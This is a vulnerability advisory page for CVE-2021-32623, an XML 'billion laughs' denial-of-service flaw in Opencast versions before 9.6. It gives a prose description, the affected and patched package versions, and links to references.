High severityNVD Advisory· Published Jun 15, 2021· Updated Aug 3, 2024
Opencast vulnerable to billion laughs attack (XML bomb)
CVE-2021-32623
Description
Opencast is a free and open source solution for automated video capture and distribution. Versions of Opencast prior to 9.6 are vulnerable to the billion laughs attack, which allows an attacker to easily execute a (seemingly permanent) denial of service attack, essentially taking down Opencast using a single HTTP request. To exploit this, users need to have ingest privileges, limiting the group of potential attackers The problem has been fixed in Opencast 9.6. There is no known workaround for this issue.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
org.opencastproject:opencast-kernelMaven | < 9.6 | 9.6 |
Affected products
2Patches
Vulnerability mechanics
References
5- github.com/advisories/GHSA-9gwx-9cwp-5c2mghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2021-32623ghsaADVISORY
- github.com/opencast/opencast/commit/16b0d641713fe31b8518fcf14fc5e4e815d81206ghsaWEB
- github.com/opencast/opencast/commit/8ae27da5a6f658011a5741b3210e715b0dc6213eghsax_refsource_MISCWEB
- github.com/opencast/opencast/security/advisories/GHSA-9gwx-9cwp-5c2mghsax_refsource_CONFIRMWEB
News mentions
0No linked articles in our index yet.